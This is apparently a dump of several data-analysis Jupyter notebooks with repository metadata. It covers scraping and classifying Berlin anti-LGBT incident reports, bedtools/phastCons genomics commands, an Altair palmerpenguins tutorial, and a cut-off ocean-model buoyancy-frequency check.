out_df.to_csv(\"../../data/competition_model/feature_dropout/bjr_all_preds_drop.csv\", index=False)\n \n", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
e731147d9d44bf3e31abbd58c06b2e6dad40e9fa
643,239
ipynb
Jupyter Notebook
final_project/Berliner_Register.ipynb
fserro/LGBT-violence-Berlin
0f11bed6d16f7ced5d8834ff9ef1b85b97490423
[ "MIT" ]
2
2021-12-18T10:11:52.000Z
2022-02-28T10:55:41.000Z
final_project/Berliner_Register.ipynb
fserro/LGBT-violence-Berlin
0f11bed6d16f7ced5d8834ff9ef1b85b97490423
[ "MIT" ]
1
2021-11-11T16:56:58.000Z
2021-11-15T09:00:16.000Z
final_project/Berliner_Register.ipynb
fserro/LGBT-violence-Berlin
0f11bed6d16f7ced5d8834ff9ef1b85b97490423
[ "MIT" ]
1
2021-11-11T15:42:35.000Z
2021-11-11T15:42:35.000Z
161.861852
202,580
0.840234
[ [ [ "import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport sys\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom langdetect import detect, detect_langs", "_____no_output_____" ] ], [ [ "Decisions:\n* Will just consider data form 2014 to 2021 because before that only a few districts were reporting\n\n**TO DO**\n* find coordinates\n * if cannot find locations, find random coordinates in the mentioned district\n* categorize incidents:\n * attack\n (against individuals)\n * physical (or physical + verbal)\n * verbal\n * propaganda\n (against community)\n * stickers, graffiti, banners\n * speeches by individuals and members of political parties (incl. in the municipal assemblies BVV)\n * public expressions (oral and written) in media and online\n * damaging of property\n * graffiti, damaging of lgbt symbols, memorials, plaques...\n * structural discrimination\n * in workplace or public/private institutions\n * reported status to police\n * yes or no\n\n**TO DO: MISC**\n* there are four incidents without a story. Indices: [2063, 2261, 2350, 4310, 4469]\n* add button to toggle language between DE and EN\n* check if I can loop through found entities in doc and determine whether they are in the listed district\n* terms to filter out attacks: Angriff, Attack, Aggression\n * check if I should search for lemmas instead. Do Angriff and angreifen have the same lemma?\n *I think not. So I should search for lemmas: Angriff, angreiffen, Attack, attackieren, Aggression, anschlagen, geschlagen\n* desambiguate addresses when coordinates are the same \n\nFalsely tagged LGBT-fobic:\n11687, 11773, 17192\n ", "_____no_output_____" ], [ "# Load pickled berlin_streets_dict", "_____no_output_____" ] ], [ [ "with open('../berlin_streets_dict.pickle', 'rb') as f:\n berlin_streets_dics = pickle.load(f)", "_____no_output_____" ], [ "len(berlin_streets_dics['Straße'])", "_____no_output_____" ] ], [ [ "# Load pickled df_complete", "_____no_output_____" ] ], [ [ "with open('pickles/df_complete.pickle', 'rb') as f:\n df_complete = pickle.load(f)", "_____no_output_____" ], [ "df_complete.loc[11041]['Story']", "_____no_output_____" ] ], [ [ "# Load pickled df_lgbt", "_____no_output_____" ] ], [ [ "with open('df_lgbt.pickle', 'rb') as f:\n df_lgbt = pickle.load(f)", "_____no_output_____" ], [ "df_complete", "_____no_output_____" ] ], [ [ "# Select df", "_____no_output_____" ] ], [ [ "# Only cases between 2014 and 2021\ndf_2014_2021 = df_complete[df_complete['Date'].dt.year >= 2014][['Date', 'District', 'Header', 'Story', 'Source']]\ndf_2014_2021.shape", "_____no_output_____" ], [ "# only cases that mention violence against LGBTQI* people in header OR in story\nlgbt_lexicon = 'heteronormativ|gay|lgbt|lgtb|lbgt|ltgb|lgbqt|schwul|schwuchtel|lsbt|transgender|'\\\n'transphob|transsex|transfrau|transperson|transmann|transfeind|homophob|queer|gleichgeschlecht|'\\\n'homosexu|homofeindlich|sexuelle[rn]* [ovi]|[^a-zöäüß]gender|binär'\n\ndf_lgbt = df_2014_2021[(df_2014_2021['Story'].str.contains(lgbt_lexicon, flags=re.IGNORECASE) == True)|(df_2014_2021['Header'].str.contains(lgbt_lexicon, flags=re.IGNORECASE) == True)]", "_____no_output_____" ], [ "# lenght of DataFrame and TODO number of characters to translate afterwards\nlen(df_lgbt), df_lgbt['Story'].str.len().sum(), df_lgbt['Header'].str.len().sum()", "_____no_output_____" ], [ "lgbt_indices = df_lgbt.index", "_____no_output_____" ], [ "# Test for LGBT words\ntest_term = 'binär'\ntest_indices = df_2014_2021[(df_2014_2021['Story'].str.contains(test_term, flags=re.IGNORECASE) == True)|(df_2014_2021['Header'].str.contains(test_term, flags=re.IGNORECASE) == True)].index\na=np.array([x for x in np.array(test_indices) if x not in np.array(lgbt_indices)])\na\n#geschlechterbild -konzept #binären", "_____no_output_____" ], [ "df_2014_2021.loc[a]['Header']\n", "_____no_output_____" ], [ "df_2014_2021.loc[17610]['Story']\n", "_____no_output_____" ] ], [ [ "### Fill missing values", "_____no_output_____" ] ], [ [ "df_lgbt[df_lgbt['District'].isna() == True]", "_____no_output_____" ], [ "df_lgbt[df_lgbt['District'].isna() == True]\n# df_lgbt['District'].loc[4512] = 'Charlottenburg-Wilmersdorf'\n# df_lgbt['District'].loc[2421] = 'Mitte'", "_____no_output_____" ], [ "# pickle df_lgbt\nwith open('df_lgbt.pickle', 'wb') as f:\n pickle.dump(df_lgbt, f)", "_____no_output_____" ] ], [ [ "# Add classifiers", "_____no_output_____" ] ], [ [ "# Add columns with np.nan\ndf_lgbt['Reported status'] = [np.nan for x in range(len(df_lgbt))]", "<ipython-input-587-39245ea6712c>:1: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n df_lgbt['Reported status'] = [np.nan for x in range(len(df_lgbt))]\n" ] ], [ [ "**Physical Attack**", "_____no_output_____" ] ], [ [ "filter_words = 'angriff|attack'\ndf_physical_attacks = df_lgbt[(df_lgbt['Header'].str.contains(filter_words, flags=re.IGNORECASE) == True)|(df_lgbt['Story'].str.contains(filter_words, flags=re.IGNORECASE) == True)]", "_____no_output_____" ], [ "physical_attack_indices = df_physical_attacks.index\nphysical_attack_indices", "_____no_output_____" ], [ "for i in attack_indices:\n df_lgbt.loc[i, 'Attack'] = 'physical'", "/opt/anaconda3/lib/python3.8/site-packages/pandas/core/indexing.py:1765: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n isetter(loc, value)\n" ] ], [ [ "**Verbal Attack**", "_____no_output_____" ] ], [ [ "df_without_physical_attacks = (df_lgbt[df_lgbt['Attack'].isna() == True])", "_____no_output_____" ], [ "filter_words = 'beleidig|beschimpf|bedroh'\ndf_verbal_attacks = df_without_physical_attacks[(df_without_physical_attacks['Header'].str.contains(filter_words, flags=re.IGNORECASE) == True)|(df_without_physical_attacks['Story'].str.contains(filter_words, flags=re.IGNORECASE) == True)]", "_____no_output_____" ], [ "# get indices\nverbal_attack_indices = df_verbal_attacks.index\nverbal_attack_indices", "_____no_output_____" ], [ "for i in verbal_attack_indices:\n df_lgbt.loc[i, 'Attack'] = 'verbal'", "/opt/anaconda3/lib/python3.8/site-packages/pandas/core/indexing.py:1765: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n isetter(loc, value)\n" ], [ "df_lgbt_test = df_lgbt[['Date', 'District', 'Header', 'Story', 'Source', 'Attack']]\ndf_lgbt_attacks = df_lgbt_test.dropna()", "_____no_output_____" ], [ "# pickle df_lgbt_attacks\nwith open('df_lgbt_attacks.pickle', 'wb') as f:\n pickle.dump(df_lgbt_attacks, f)", "_____no_output_____" ] ], [ [ "### Add coordinates", "_____no_output_____" ] ], [ [ "from geopy.geocoders import Nominatim", "_____no_output_____" ], [ "loc = Nominatim(user_agent=\"mymap\").geocode(\"europacenter\")\nloc.address", "_____no_output_____" ], [ "coord = loc.latitude, loc.longitude\ncoord", "_____no_output_____" ], [ "df_2014_2021_attacks[df_2014_2021_attacks['Story'].str.contains(lgbt_lexicon, flags=re.IGNORECASE) == True]\n", "_____no_output_____" ], [ "df_2020_monthly_district = df_2020.groupby(['District', df_complete['Date'].dt.month])[['Header']].count().unstack('District')", "_____no_output_____" ], [ "df_2020_monthly_district", "_____no_output_____" ], [ "df_2020_monthly_district.plot(figsize=(20,8), kind='bar', xlabel='month', ylabel='reported cases')", "_____no_output_____" ], [ "df_2014_2021 = df_complete[df_complete['Date'].dt.year >= 2014][['Date', 'District', 'Header', 'Source']]", "_____no_output_____" ], [ "df_2014_2021_yearly_district = df_2014_2021.groupby(['District', df_complete['Date'].dt.year])[['Header']].count().unstack('District')\ndf_2014_2021_yearly_district\n", "_____no_output_____" ], [ "df_2014_2021_yearly_district.plot(figsize=(20,8), kind='bar', xlabel='year', ylabel='reported cases')", "_____no_output_____" ], [ "df_attacks_2014_2021 = df_2014_2021[df_2014_2021['Header'].str.contains('angriff|attack|beleidig|beschimpf|bedroh', flags=re.IGNORECASE) == True]\n", "_____no_output_____" ], [ "df_attacks_2014_2021", "_____no_output_____" ], [ "df_attacks_2014_2021_yearly_district = df_attacks_2014_2021.groupby(['District', df_complete['Date'].dt.year])[['Header']].count().unstack('District')\ndf_attacks_2014_2021_yearly_district\n", "_____no_output_____" ], [ "df_attacks_2014_2021_yearly_district.plot(figsize=(20,8), kind='area', xlabel='year', ylabel='reported cases')", "_____no_output_____" ], [ "df_attacks_2014_2021_monthly_district = df_attacks_2014_2021.groupby(['District', df_complete['Date'].dt.month])[['Header']].count().unstack('District')\ndf_attacks_2014_2021_monthly_district\n", "_____no_output_____" ], [ "df_attacks_2014_2021_monthly_district.plot(figsize=(20,8), kind='area', xlabel='month', ylabel='reported cases')", "_____no_output_____" ], [ "df_2014_2021 = df_complete[df_complete['Date'].dt.year >= 2014][['Date', 'District', 'Header', 'Source', 'Story']]", "_____no_output_____" ], [ "df_2014_2021_attacks = df_2014_2021[df_2014_2021['Header'].str.contains('angriff|attack|beleidig|beschimpf', flags=re.IGNORECASE) == True]", "_____no_output_____" ], [ "df_2014_2021_attacks.shape", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks = df_2014_2021_attacks[df_2014_2021_attacks['Story'].str.contains('gay|lgbt|lgtb|schwul|lsbt|transphob|transsex|transfrau|transmann|transfeindlich|homophob|gleichgeschlecht', flags=re.IGNORECASE) == True]\n", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.shape", "_____no_output_____" ], [ "df_2014_2021.loc[20746]['Story']", "_____no_output_____" ], [ "df_2014_2021[df_2014_2021['Date'] == \"2021-05-29\"]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.shape", "_____no_output_____" ] ], [ [ "### Add District (Mitte) to missing value index= 2421", "_____no_output_____" ] ], [ [ "df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['District'].isna() == True]['Story'].iloc[0]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['District'].isna() == True]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.loc[2421, 'District'] = 'Mitte'", "/opt/anaconda3/lib/python3.8/site-packages/pandas/core/indexing.py:1765: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n isetter(loc, value)\n" ], [ "df_2014_2021_lgbt_attacks.loc[2421]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.iloc[-100:-50]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.iloc[-3]['Story']", "_____no_output_____" ], [ "# Olympia & Cheryl attach\ndf_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['District'] == 'Neukölln'][df_2014_2021_lgbt_attacks['Date'] == '2020-04-12']['Story'].iloc[0]", "<ipython-input-614-241ff01241a7>:2: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['District'] == 'Neukölln'][df_2014_2021_lgbt_attacks['Date'] == '2020-04-12']['Story'].iloc[0]\n" ] ], [ [ "## Check for references to Turks or Arabs", "_____no_output_____" ] ], [ [ "df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['Story'].str.contains('arab|turk') == True]['Date']", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['Date'].dt.year == 2018]", "_____no_output_____" ], [ "df_2014_2021.loc[10294]['Story']", "_____no_output_____" ] ], [ [ "### Detect languages and find missing stories in df_complete", "_____no_output_____" ], [ "All stories in German. Some include text in English too.", "_____no_output_____" ] ], [ [ "list(df_complete['Story']", "_____no_output_____" ], [ "stories = list(df_complete['Story'])\nlanguages_stories = []\nmissing_stories = [] # index of missing stories in LIST stories\nfor i, story in enumerate(stories):\n try:\n lan = detect(story)\n except:\n lan = np.nan\n missing_stories.append(i)\n languages_stories.append(lan)", "_____no_output_____" ], [ "set(languages_stories)", "_____no_output_____" ], [ "# indices of stories in en, nl and missing \nindices_en = [i for i, x in enumerate(languages_stories) if x == \"en\"]\nindices_nl = [i for i, x in enumerate(languages_stories) if x == \"nl\"]\nindices_nan = [i for i, x in enumerate(languages_stories) if type(x) != str]", "_____no_output_____" ] ], [ [ "---", "_____no_output_____" ], [ "## Scrape data", "_____no_output_____" ] ], [ [ "def scrape_links():\n '''\n Scrapes links of all the cases registered \n '''\n years = [x for x in range(2007, 2022)]\n links_cases = []\n titles_cases = []\n for year in years:\n path = f'https://berliner-register.de/chronik?field_datum_value%5Bvalue%5D%5Byear%5D={year}'\n response = requests.get(path)\n chronik_list_html = response.text\n chronik_list_soup = BeautifulSoup(chronik_list_html)#, features=\"lxml\")\n html_links = chronik_list_soup.find_all(attrs={'class': 'views-field views-field-title'})\n for i in html_links:\n str_entry = str(i.find_all('a')[0])\n path_end, case_title = re.findall('(\\/.+)\">(.+)<', str_entry)[0]\n path = 'https://berliner-register.de' + path_end\n links_cases.append(path)\n titles_cases.append(case_title)\n return links_cases", "_____no_output_____" ], [ "# pickled links_cases: list of all links\nwith open('links_cases.pickle', 'wb') as f:\n pickle.dump(links_cases, f)", "_____no_output_____" ], [ "def make_cases_dict():\n cases_dict = {'Date': [], 'District': [], 'Header': [], 'Story': [], 'Source': [], 'ID': [], 'Link': []}\n for path in links_cases:\n try:\n case_id = int(re.findall('\\d+$', path)[0])\n except:\n case_id = np.nan\n response = requests.get(path)\n case_html = response.text\n case_soup = BeautifulSoup(case_html).find(attrs={'id': 'main'})\n case_title = case_soup.h1.text\n try:\n case_description_soup = case_soup.find_all('p')\n # makes sure all paragraphs are extracted\n case_description_list = [x.text for x in case_description_soup]\n case_description = '\\n'.join(case_description_list)\n except:\n case_description = np.nan\n try:\n case_bezirk = case_soup.find(attrs={\n 'class': \"field field-name-field-register-vorfall field-type-taxonomy-term-reference field-label-inline clearfix\"}).find(attrs={\n 'class': 'field-item even'\n }).text\n except:\n case_bezirk = np.nan\n try:\n case_date = case_soup.find(attrs={\n 'class': 'field field-name-field-datum field-type-datetime field-label-inline clearfix'\n }).find(attrs={'class': 'field-item even'}).text\n except:\n case_date = np.nan\n try:\n case_source = case_soup.find(attrs={\n 'class': 'field field-name-field-quelle field-type-text field-label-inline clearfix'\n }).find(attrs={'class': 'field-item even'}).text\n except:\n case_source = np.nan\n\n cases_dict['Link'].append(path)\n cases_dict['ID'].append(case_id)\n cases_dict['Date'].append(case_date)\n cases_dict['District'].append(case_bezirk)\n cases_dict['Header'].append(case_title)\n cases_dict['Story'].append(case_description)\n cases_dict['Source'].append(case_source)\n\n return cases_dict", "_____no_output_____" ], [ "# pickle cases_dict: dictionary that leads to dataframe\nwith open('cases_dict.pickle', 'wb') as f:\n pickle.dump(cases_dict, f)", "_____no_output_____" ] ], [ [ "#### Make dataframe", "_____no_output_____" ] ], [ [ "df_complete = pd.DataFrame(cases_dict)\ndf_complete['Date'] = pd.to_datetime(df_complete['Date']) # parse dates", "_____no_output_____" ], [ "# pickle df_complete\nwith open('df_complete.pickle', 'wb') as f:\n pickle.dump(df_complete, f)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
e73119ce6b1023850fa9f5ddd0685990cc132480
2,105
ipynb
Jupyter Notebook
notebook/.ipynb_checkpoints/history-checkpoint.ipynb
isabelleberger/isabelle-
d1337814fac73e7e6d516d1fb5e118a5dd6aeced
[ "MIT" ]
null
null
null
notebook/.ipynb_checkpoints/history-checkpoint.ipynb
isabelleberger/isabelle-
d1337814fac73e7e6d516d1fb5e118a5dd6aeced
[ "MIT" ]
null
null
null
notebook/.ipynb_checkpoints/history-checkpoint.ipynb
isabelleberger/isabelle-
d1337814fac73e7e6d516d1fb5e118a5dd6aeced
[ "MIT" ]
null
null
null
27.337662
141
0.6038
[ [ [ "Commands so far:\n\n-convert fimo to bed using fimo2bed.py (input is motif_alignments_flyFactor_dm6.2L.txt, output adds a \"._bed\" to end of file name)\n-slop gives gene_only_slop: bedtools slop: \n bedtools slop -i dmel-all-r6.12.gene_only.chr.gff -g ChromInfo.txt -l 1000 -r 0 -s\n-bedtools intersect -a motif_alignments_flyFactor_dm6.2L_BED.bed -b dmelr6.12.gene_only_slop.txt -wb > bedtoolsintersect_out.txt\n-phastcons steps: \n * wig2bed < dm6.27way.phastCons.wigFix > dm6_phastcons.bed\n * grep \"chr2L\" dm6_phastcons.bed > small.bed\n * bedtools intersect -a bedtoolsintersect_out.txt -b small.bed -wo > dm6_phastcons_intersect.txt\n * python phastcons_table.py --input /Users/bergeric/data/dm6_phastcons_intersect.txt --output practiceoutfile.txt\n ", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e7311c82ccfd13f5bdd18ac14184d327033355bd
361,217
ipynb
Jupyter Notebook
art of data/topics/data viz/archive/altair_cont.ipynb
lee-edu/materials
529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22
[ "MIT" ]
null
null
null
art of data/topics/data viz/archive/altair_cont.ipynb
lee-edu/materials
529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22
[ "MIT" ]
null
null
null
art of data/topics/data viz/archive/altair_cont.ipynb
lee-edu/materials
529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22
[ "MIT" ]
null
null
null
887.511057
69,813
0.576728
[ [ [ "# Altair Continued\nWe last looked at the US Employment dataset, and created some starter visualizations. This time, we'll be analyzing and visualizing the [palmerpenguins](https://github.com/allisonhorst/palmerpenguins) dataset, which is a great starter dataset! More information can be found by following the link (including images of cute penguins.)\n\n## Palmer Penguins\nYou will have to run `pip3 install palmerpenguins` in order to have access to the dataset. If you are using Google Colab, you can simply run the following code cell.", "_____no_output_____" ] ], [ [ "#!pip install palmerpenguins", "_____no_output_____" ], [ "import altair as alt\nfrom palmerpenguins import load_penguins\n\npenguins = load_penguins()\npenguins.sample(5)", "_____no_output_____" ] ], [ [ "## Data Exploration\nUsing the methods from the previous worksheet, answer the following questions about the palmerpenguins dataset.\n\n### Question 1: Which species of penguins are represented in this dataset?", "_____no_output_____" ] ], [ [ "# Write your answer to question 1 here", "_____no_output_____" ] ], [ [ "### Question 2: On average, which species of penguin has the longest beak?", "_____no_output_____" ] ], [ [ "# Write your answer to question 2 here", "_____no_output_____" ] ], [ [ "### Question 3: Describe the relationship between flipper length and bill length.", "_____no_output_____" ] ], [ [ "# Write your answer to question 3 here", "_____no_output_____" ] ], [ [ "### Question 4: Create a scatterplot for flipper length vs bill length. Each species should be a different color.", "_____no_output_____" ] ], [ [ "# Write your answer to question 4 here", "_____no_output_____" ] ], [ [ "### Question 5: Compare and describe the distribution of flipper lengths across the different species.", "_____no_output_____" ] ], [ [ "# Write your answer to question 5 here", "_____no_output_____" ] ], [ [ "## More Altair!\nLet's start off by visualizing the relationship between bill length and bill depth. Notice the use of `.interactive()` after we've defined the marks and channels. This allows the user to scroll and pan through the visualization -- since this is such a common request, Altair provides it by default!", "_____no_output_____" ] ], [ [ "alt.Chart(penguins).mark_point().encode(\n x=\"bill_length_mm:Q\",\n y=\"bill_depth_mm:Q\"\n).interactive()", "_____no_output_____" ], [ "# Now let's color-code the species\nspecies_color = alt.Color(\"species:N\") # We can extract this out into a separate variable\n\nalt.Chart(penguins).mark_point().encode(\n x=\"bill_length_mm:Q\",\n y=\"bill_depth_mm:Q\",\n color=species_color\n).interactive()", "_____no_output_____" ], [ "# Now to create our own legend (this will come in handy soon!)\nspecies_color = alt.Color(\"species:N\", legend=None) # Remove the default legend\n\n# Create scatterplot of bill length vs bill depth\nbills = alt.Chart(penguins).mark_point().encode( # Notice we create a new Chart variable\n x=\"bill_length_mm:Q\",\n y=\"bill_depth_mm:Q\",\n color=species_color\n).interactive()\n\nlegend = alt.Chart(penguins).mark_rect().encode( # We also create a legend variable (it's a mini viz)\n y=alt.Y(\"species:N\", axis=alt.Axis(orient=\"right\")),\n color=species_color # Reusing the species_color variable -- this is why we created it!\n)\n\nbills | legend # It's this easy to mash visualizations together", "_____no_output_____" ] ], [ [ "## Other Interactions\nWhat if you want to do more than just panning and zooming? Then you'll need to understand how Altair represents interactions. More information can be found [at the documentation here](https://altair-viz.github.io/user_guide/interactions.html). The next few examples are based on the documentation.\n\n### Selections and Conditions\nYou must first identify a `selection`; this allows a viewer to interact with and select specific parts of your visualization.\n\nThen, you have to identify a `condition` that changes depending on what is being selected.\n\n### A Simple Example\nHere's an example of a rectangular selection -- the user is allowed to click and drag on the graph (the `selection`), and the color of the dots will change depending on whether or not it is inside the selection (the `condition`).", "_____no_output_____" ] ], [ [ "selection = alt.selection_interval() # Use a rectangular selection\n\nspecies_color = alt.condition(selection, # Set the color to change depending on a the selection\n alt.Color(\"species:N\", legend=None),\n alt.value(\"lightgray\"))\n\n# Create scatterplot of bill length vs bill depth\nbills = alt.Chart(penguins).mark_point().encode(\n x=alt.X(\"bill_length_mm:Q\", scale=alt.Scale(zero=False)),\n y=alt.Y(\"bill_depth_mm:Q\", scale=alt.Scale(zero=False)),\n color=species_color\n).add_selection( # We have to tell the chart to use the selection we've defined\n selection\n)\n\n# Create corresponding legend for species\nlegend = alt.Chart(penguins).mark_rect().encode(\n y=alt.Y(\"species:N\", axis=alt.Axis(orient=\"right\")),\n color=species_color\n)\n\nbills | legend", "_____no_output_____" ] ], [ [ "### A More Complicated Example\nWhat if you wanted to allow the viewer to click on a species to see all the corresponding points? Examine the code below while thinking about what the *selection* and *condition* are.", "_____no_output_____" ] ], [ [ "selection = alt.selection_multi(fields=['species']) # A different kind of selection!\n\nspecies_color = alt.condition(selection, # Set the color to change depending on a the selection\n alt.Color(\"species:N\", legend=None),\n alt.value(\"lightgray\"))\n\n# Create scatterplot of bill length vs bill depth\nbills = alt.Chart(penguins).mark_point().encode(\n x=alt.X(\"bill_length_mm:Q\", scale=alt.Scale(zero=False)),\n y=alt.Y(\"bill_depth_mm:Q\", scale=alt.Scale(zero=False)),\n color=species_color\n).interactive()\n\n# Create corresponding legend for species\nlegend = alt.Chart(penguins).mark_rect().encode(\n y=alt.Y(\"species:N\", axis=alt.Axis(orient=\"right\")),\n color=species_color\n).add_selection(selection) # We now add it to the legend instead, since that is what the viewer interacts with\n\nbills | legend", "_____no_output_____" ] ], [ [ "## Your Turn to Practice\nLook through the above examples and documentation! **Make sure you read carefully through my code!** These will be good references.\n\n### Practice 1: Visualize the relationship between flipper length and body mass. Allow the user to filter by species.", "_____no_output_____" ] ], [ [ "# Write your code for Practice 1 here.", "_____no_output_____" ] ], [ [ "### Practice 2: Visualize the relationship between island and body mass. Choose appropriate marks, channels, and interactions!", "_____no_output_____" ] ], [ [ "# Write your code for Practice 2 here.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e7311f374997f270c36074854b0a9ee22e1bcaf6
444,801
ipynb
Jupyter Notebook
analysis/Testing Buoyancy Frequency.ipynb
SalishSeaCast/2d-domain
4dc2a427bda00230fa629c89563cfbd9cd7dde84
[ "Apache-2.0" ]
null
null
null
analysis/Testing Buoyancy Frequency.ipynb
SalishSeaCast/2d-domain
4dc2a427bda00230fa629c89563cfbd9cd7dde84
[ "Apache-2.0" ]
null
null
null
analysis/Testing Buoyancy Frequency.ipynb
SalishSeaCast/2d-domain
4dc2a427bda00230fa629c89563cfbd9cd7dde84
[ "Apache-2.0" ]
null
null
null
995.080537
257,250
0.943035
[ [ [ "A notebook to test the calculation of the buuoyancy frequency as implemented in froude.py.", "_____no_output_____" ] ], [ [ "import matplotlib.pyplot as plt\nimport netCDF4 as nc\nimport froude\nimport os\nimport numpy as np\nimport datetime\n\n%matplotlib inline", "_____no_output_____" ] ], [ [ "Load some data to experiment with", "_____no_output_____" ] ], [ [ "path = '/data/nsoontie/MEOPAR/SalishSea/results/2Ddomain/3.6'\ndirectory = 'base_aug'\nfile_part = 'SalishSea_1d_20030819_20030927_{}.nc'\n\ndT = nc.Dataset(os.path.join(path,directory,file_part.format('grid_T')))\nsal = dT.variables['vosaline'][:]\nsal = np.ma.masked_values(sal,0)\ndeps = dT.variables['deptht'][:]\ntemp = dT.variables['votemper'][:]\ntemp = np.ma.masked_values(temp,0)\nssh = dT.variables['sossheig'][:]\nn2 = dT.variables['buoy_n2'][:]\nn2 = np.ma.masked_values(n2,0)\ntimes = dT.variables['time_counter'][:]\ntime_origin = datetime.datetime.strptime(dT.variables['time_counter'].time_origin, '%Y-%m-%d %H:%M:%S')\n\ndU = nc.Dataset(os.path.join(path,directory,file_part.format('grid_U')))\nU = dU.variables['vozocrtx'][:]\nU = np.ma.masked_values(U,0)\ndepsU=dU.variables['depthu'][:]\n\ndW = nc.Dataset(os.path.join(path,directory,file_part.format('grid_W')))\navt = dW.variables['vert_eddy_diff'][:]\navt = np.ma.masked_values(avt,0)\navm = dW.variables['vert_eddy_visc'][:]\navm = np.ma.masked_values(avm,0)\ndepsW=dW.variables['depthw'][:]\ndiss = dW.variables['dissipation'][:]\ndiss = np.ma.masked_values(diss,0)\n\n\n", "_____no_output_____" ] ], [ [ "Load the mesh_mask file for scale factors", "_____no_output_____" ] ], [ [ "mesh = nc.Dataset('/data/nsoontie/MEOPAR/2Ddomain/grid/mesh_mask.nc')\n\ne3w = mesh.variables['e3w'][0,:,:,:] # NEMO uses e3w.", "_____no_output_____" ], [ "rho = froude.calculate_density(temp, sal)", "_____no_output_____" ] ], [ [ "Calculate buoyancy frequency with froude module", "_____no_output_____" ] ], [ [ "reload(froude)", "_____no_output_____" ], [ "n2_f = froude.calculate_buoyancy_frequency(temp, sal, e3w, 1)\nn2_f = np.ma.masked_values(n2_f,0)", "_____no_output_____" ] ], [ [ "Plot n2_f to see that it makes sense. ", "_____no_output_____" ] ], [ [ "yslice=5\nfig, axs = plt.subplots(8,5,figsize=(20,10))\nfor t, ax in zip (np.arange(times.shape[0]), axs.flat):\n ax.pcolor(np.arange(n2_f.shape[-1]),deps,n2_f[t,:,yslice,:],vmin=-0.01,vmax = 0.01)\n ax.set_title(t)\n ax.set_ylim([400,0])", "_____no_output_____" ] ], [ [ "Compare with NEMO's buoyancy frequency.", "_____no_output_____" ] ], [ [ "diff = n2-n2_f;\n\nprint np.ma.max(diff)\nprint np.ma.min(diff)\nprint np.ma.mean(diff)", "0.0637975778828\n-0.0582721825923\n-9.82715828842e-05\n" ], [ "ind = np.unravel_index(np.ma.argmax(diff), diff.shape)\nind", "_____no_output_____" ], [ "for t in np.arange(times.shape[0]):\n max = np.ma.max(diff[t,...])\n ind = np.unravel_index(np.ma.argmax(diff[t,...]), diff[t,:,:,:].shape)\n print t, ind, max", "0 (4, 4, 1098) 0.0637975778828\n1 (4, 4, 1098) 0.0608109813299\n2 (4, 3, 1098) 0.0397740351603\n3 (4, 6, 1098) 0.0209874000337\n4 (5, 4, 1098) 0.00988855767693\n5 (5, 3, 1098) 0.00900880743467\n6 (5, 2, 1098) 0.00978058835956\n7 (9, 